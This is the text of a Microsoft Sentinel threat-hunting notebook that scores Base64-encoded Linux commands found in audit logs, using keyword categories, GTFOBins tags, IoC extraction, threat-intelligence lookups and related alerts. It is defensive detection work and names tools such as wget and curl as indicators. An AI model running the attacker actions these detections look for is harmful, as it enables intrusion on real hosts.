Path: blob/master/Guided Hunting - Base64-Encoded Linux Commands.ipynb
3249 views
Guided Hunting - Base64-Encoded Linux Commands
Details...
Notebook Version: 1.0
Python Version: Python 3.6 (including Python 3.6 - AzureML)
Required Packages: kqlmagic, msticpy, pandas, numpy, matplotlib, networkx, seaborn, datetime, ipywidgets, ipython, dnspython, folium, maxminddb_geolite2, BeautifulSoup
Data Sources Required:
Log Analytics/Microsoft Sentinel - Syslog, Security Alerts, Auditd, Azure Network Analytics.
VirusTotal, AlienVault OTX, and IBM XForce require account and API key, which are free to create on their respective websites. If you'd prefer to use only one or prefer one over the others, there will be further instruction in the following sections.
This notebook is a collection of tools for detecting malicious behavior when commands are Base64-encoded. It allows you to specify a workspace and time frame and will score and rank Base64 commands within those bounds.
It utilizes multiple data sources, primarily focusing on Microsoft Sentinel Syslog data augmented by telemetry from the MSTIC research branch of the AUOMS audit collection tool. Make sure to install this agent and connect your virtual machines with Microsoft Sentinel before using this notebook. For more on this, please see this blog post.
This notebook also uses data from GTFOBins, a list of Unix binaries that can be exploited by attackers. These bash commands are labeled with preliminary functions that can help an investigator better understand what a command does.
Finally, we use TI intel from AlienVaultOTX, VirusTotal, and IBM XForce to highlight and emphasize certain Base64 commands.
Table of Contents
Notebook Setup
The next cell:
Checks for the correct Python version
Checks versions and optionally installs required packages
Imports the required packages into the notebook
Sets a number of configuration options.
This should complete without errors. If you encounter errors or warnings look at the following two notebooks:
If you are running in the Microsoft Sentinel Notebooks environment (Azure Notebooks or Azure ML) you can run live versions of these notebooks:
You may also need to do some additional configuration to successfully use functions such as Threat Intelligence service lookup and Geo IP lookup. There are more details about this in the ConfiguringNotebookEnvironment notebook and in these documents:
msticpy configuration; This file is found in the same folder this notebook is in: Microsoft Sentinel Notebooks.
If you are unfamiliar with Jupyter notebooks, or want a more in-depth setup reference, check out these resources:
Connect to Log Analytics
Run the cells below to connect to your Log Analytics workspace. If you haven't already, please fill in the relevant information in msticpyconfig.yaml. This file is found in the Microsoft Sentinel Notebooks folder this notebook is in. There is more information on how to do this in the Notebook Setup section above. You may need to restart the kernel after doing so and rerun any cells you've already run to update to the new information.
If you are unfamiliar with connecting to Log Analytics or want a more in-depth walkthrough, check out the Getting Started with Microsoft Sentinel Notebook.
Set Time Parameters
Run the cell below, then use the sliding bar that pops up to adjust the time frame in which you want the query to find Base64 commands.
Decide the time frame of your query
Get Base64 Commands
The following cell queries all Base64 commands in your Log Analytics workspace during the given time frame and queries data from AUOMS_EXECVE logs, which are discussed in this blog post, which was mentioned earlier. This is the data the rest of the commands will run on. The query is written in KQL. If you would like to add additional information to the query results, you may do it here. Note that following cells rely on this output so the original columns must still be projected.
If you prefer to use a different log (not AUOMS_EXECVE), you may write your own query and will potentially have to edit certain values throughout the rest of the notebook to get the correct values and data frames.
Basic Command Categorization
We will be categorizing commands in two ways: this cell categorizes commands by looking for commonly used commands we are aware of. The next section will use an open source compilation.
This cell categorizes each decoded Base64 command by functionality based on what bash commands are present in the decoded version. For example, commands with "wget" or "curl" in them are categorized as "Network connections/Downloading." Other categories include "File Manipulation", "Host Enumeration", and "File/Process deletion/killing."
This categorization is by no means exhaustive. Feel free to add commands and categories to our basic one.
GTFO Bins Classification
This cell categorizes the commands based on GTFOBins. GTFOBins is a vetted collection of bash commands frequently exploited by attackers as well as a reference as to how those commands may be used. We are using it to find potentially exploited commands in the dataset and tag those with their corresponding functionalities.
Run the cell below to read about what each category means according to the GTFOBins website.
The following cell tags commands with GTFOBins bins and functions and displays the dataframe again for viewing. You may click on the links in the 'GTFO Bins' column for easy access to the GTFOBins website and more information.
Generate Scores and Rankings
The following sections generate scores for each unique Base64 command based on criteria such as frequency of the command, severity of TI lookup results, and related commands run. Each score is added to the dataframe at the end, so you can view and rank each individually or by the aggregate score.
Scores are somewhat artificially created and are meant to help investigators understand and highlight commands that are more likely to be malicious. They do not represent any mathematical value and are not calculated in comparison to any particular number other than each other, where higher scores are more likely to be malicious commands.
Frequency Analysis
The cell below creates a frequency score for each unique Base64 command by calculating (1 / # times command occured in the workspace). It then adds an additional score calculated by (1 / # times command occured in its host computer). Both of these scores are divided by 2 for normalization purposes.
This results in rarer commands getting higher scores.
Extract IoCs
The cell below extracts any IoCs from the decoded Base64 commands and adds them to the dataframe. It uses the MSTICpy IoC extraction features, which extract the following patterns:
ipv4
ipv6
dns
url
windows_path
linux_path
md5_hash
sha1_hash
sha256_hash
If you want to look for an IoC pattern that is not included, here feel free to modify the MSTICpy class. See this link for more information.
Threat Intelligence Lookup
Load and run TILookup on IoCs found. Make sure you configure msticpyconfig.yaml with the appropriate TI sources. Check out the document below if you need help with this) process.
We highly encourage you to add TI sources, but if you don't have any (i.e. API keys from AlienVault OTX, IBM XForce, or VirusTotal) and don't want to make accounts, you can skip this section and go to directly to Related Alerts Scoring below. Your rankings will be based exclusively on frequency scores and related alerts scoring in this case.
Confirm TI Sources
The below code will print out your current TI Lookup configurations.
Choose which providers you would like to use during the TI lookup. You will need these to be configured on msticpyconfig.yaml. Additional directions given above in the Notebook Setup section.
Choose IoCs to look up
You can choose IoCs you're interested in to look up or look up all of them for scoring. Scores will be based exclusively on the Severity column. The following cells will also print a TI dataframe with added information.
Run this cell to look up the selected IoCs above.
Calculate TI Severity Scores
The following cell uses the most severe of the severity scores provided by the providers to add to each score. The more severe the IoC found, the higher the score the command will receive. Each unique IoC found will add to the score of that command.
Related Alerts
This section searches for any related Sentinel alerts on the hosts we've found Base64 commands on in the given time frame.
Points are added to the score depending on the severity of the alerts that occurred at this time. For example, high severity alerts around the Base64 commands will result in a higher score for those commands. Each unique alert's score is only added once. Alert information as well as timeline visualizations will also be printed out to provide context and enable further investigation. Be sure to scroll for information on all the hosts.
View the score again by running the cell below.
Final Scores and Rankings
Run the cell below to choose the columns you would like to view. You must select TotalScore for rankings to work.
Run this cell to display the columns you chose above. Score columns will be colored a certain amount of red to help you visualize what percent of the total score is made up of each type of score and how these compare with other command scores.
You can also choose to only view data with numerical columns over a given cutoff by selecting a column and choosing a cutoff point.
You can use the following bar chart to view the compositions of the scores in a visual manner. The horizontal axis represents the index of the command in the data frame, so you can reference the data frame above for context around any interesting data you see.
Behavior Timeline
This timeline visualizes when commands occurred to identify potential windows of activity.